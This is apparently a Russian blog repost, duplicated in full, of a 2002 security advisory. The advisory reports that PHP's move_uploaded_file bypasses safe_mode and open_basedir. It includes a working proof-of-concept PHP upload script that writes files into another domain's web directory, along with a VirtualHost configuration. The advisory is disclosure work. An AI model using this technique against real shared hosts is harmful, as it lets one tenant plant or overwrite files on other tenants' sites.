grayangel
равновесник
Новый глюк в Php :-(
Хай усем!
----------------------------------------------------------------------------------
From: Tozz <[email protected]>
Date: 20 марта 2002 г.
Subject: move_uploaded_file breaks safe_mode restrictions in PHP
--------------------------------------------------------------------------------
Hey
Its possible to circumvent (probadly spelled wrong) PHP safe_mode
restrictions by using move_uploaded_file.
You take this nasty script (and you have domain whatever.com and your
directory path is
/domains/whatever.com/ )
<?
$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];
$size_limit = "100000"; // set size limit in bytes
if ($file){
if ($size < $size_limit){
move_uploaded_file($temp,
"/domains/somebodyelse.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded";
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}
echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>
As you can see, he moved the uploaded file to:
"/domains/somebodyelse.org/public_html/www/test/" while the user is
restricted with both safe_mode and open_basedir.
Virtualhost configuration snippet:
<VirtualHost IP_HERE>
DocumentRoot /domains/whatever.com/public_html/root/
ServerName root.whatever.com
CustomLog /domains/whatever.com/logs/access_log combined
ErrorLog /domains/whatever.com/logs/error_log
php_admin_value safe_mode 1
php_admin_value open_basedir /domains/whatever.com/public_html/root/
</VirtualHost>
As you can see I have both set safe_mode and the open_basedir
restriction but this user is able to upload any file where the apache
user has write access.
PHP.net is notified, and the bug has been fixed in CVS. However, I am unable
to compile the CVS version atm. Gives alot of 'make' errors. Thanks go out
to bastijs for pointing this out to me.
Bye,
Tozz
------------------------------------------------------------------------------
Источник: http://www.security.nnov.ru/search/document.asp?docid=2654
Хай усем!
----------------------------------------------------------------------------------
From: Tozz <[email protected]>
Date: 20 марта 2002 г.
Subject: move_uploaded_file breaks safe_mode restrictions in PHP
--------------------------------------------------------------------------------
Hey
Its possible to circumvent (probadly spelled wrong) PHP safe_mode
restrictions by using move_uploaded_file.
You take this nasty script (and you have domain whatever.com and your
directory path is
/domains/whatever.com/ )
<?
$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];
$size_limit = "100000"; // set size limit in bytes
if ($file){
if ($size < $size_limit){
move_uploaded_file($temp,
"/domains/somebodyelse.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded";
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}
echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>
As you can see, he moved the uploaded file to:
"/domains/somebodyelse.org/public_html/www/test/" while the user is
restricted with both safe_mode and open_basedir.
Virtualhost configuration snippet:
<VirtualHost IP_HERE>
DocumentRoot /domains/whatever.com/public_html/root/
ServerName root.whatever.com
CustomLog /domains/whatever.com/logs/access_log combined
ErrorLog /domains/whatever.com/logs/error_log
php_admin_value safe_mode 1
php_admin_value open_basedir /domains/whatever.com/public_html/root/
</VirtualHost>
As you can see I have both set safe_mode and the open_basedir
restriction but this user is able to upload any file where the apache
user has write access.
PHP.net is notified, and the bug has been fixed in CVS. However, I am unable
to compile the CVS version atm. Gives alot of 'make' errors. Thanks go out
to bastijs for pointing this out to me.
Bye,
Tozz
------------------------------------------------------------------------------
Источник: http://www.security.nnov.ru/search/document.asp?docid=2654